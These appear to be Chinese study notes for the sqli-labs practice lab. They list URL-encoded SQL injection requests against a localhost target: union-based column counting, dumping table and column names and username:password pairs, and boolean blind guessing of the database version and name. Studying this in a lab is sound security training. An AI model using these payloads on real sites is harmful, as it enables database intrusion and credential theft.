Union注入
1.寻找注入点
http://127.0.0.1/sqlilab/Less-1/?id=1
http://127.0.0.1/sqlilab/Less-1/?id=1'
猜测源代码
SELECT * FROM users WHERE id='$id' LIMIT 0,1
2.查询字段数量
http://127.0.0.1/sqlilab/Less-1/?id=1' order by 3 --+
http://127.0.0.1/sqlilab/Less-1/?id=1' order by 4 --+
3.爆出数据库
http://127.0.0.1/sqlilab/Less-1/?id=-1' union select 1,2,3 --+
http://127.0.0.1/sqlilab/Less-1/?id=-1' union select 1,2,database() --+
http://127.0.0.1/sqlilab/Less-1/?id=-1' union select 1,2,group_concat(table_name) from information_schema.tables where table_schema=database() --+
http://127.0.0.1/sqlilab/Less-1/?id=-1' union select 1,2,group_concat(column_name) from information_schema.columns where table_schema='security' and table_name='users' --+
http://127.0.0.1/sqlilab/Less-1/?id=-1' union select 1,2,group_concat(username,0x3a,password) from users --+
盲注
1.按位猜测数据库版本
http://127.0.0.1/sqlilab/Less-5/?id=1' and left(version(),1)=5 --+
http://127.0.0.1/sqlilab/Less-5/?id=1' and left(version(),6)='5.6.17' --+
left(a,b) 从左侧截取字符串a的前b位
2.按位猜测数据库名
http://127.0.0.1/sqlilab/Less-5/?id=1' and left(database(),1)>'a' --+
http://127.0.0.1/sqlilab/Less-5/?id=1' and left(database(),8)='security' --+